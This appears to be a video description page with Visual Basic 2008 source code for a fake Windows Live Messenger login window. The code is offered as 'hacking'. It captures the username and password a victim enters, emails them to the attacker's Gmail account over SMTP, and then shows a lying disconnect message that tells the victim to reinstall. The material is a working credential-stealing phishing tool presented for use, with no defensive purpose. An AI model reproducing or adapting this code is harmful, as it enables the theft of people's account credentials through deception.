Visual Basic 2008 Windows Live Messenger HackingCreate a windows live messenger and send the information which submited in you GMAIL E-MAIL.. Please comment and rate the video! ----------------------------------------------------------------------------- Code: Imports System.Net.Mail Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim smtpserver As New SmtpClient() Dim mail As New MailMessage() smtpserver.Credentials = New Net.NetworkCredential("YOUR GMAIL HERE", "PASSWORD") smtpserver.Port = 587 smtpserver.Host = "smtp.gmail.com" smtpserver.EnableSsl = True mail.From = New MailAddress("YOUR GMAIL E-MAIL HERE") mail.Subject = "UserName: " & TextBox1.Text mail.To.Add("YOUR GMAIL E-MAIL HERE") mail.Body = "UserName: " & TextBox1.Text & ", " & "Password: " & TextBox2.Text smtpserver.Send(mail) MsgBox("You have been disconnect from the server. There are new Windows Live Messenger version, Please download it and sign in again") End Sub End Class ------------------------------------------------------------------------------ Thanks for watching. Hope to enjoy. :) code pour embarquer la vidéo : >>> http://www.youtube.com/embed/n86U3HykP1M <<< |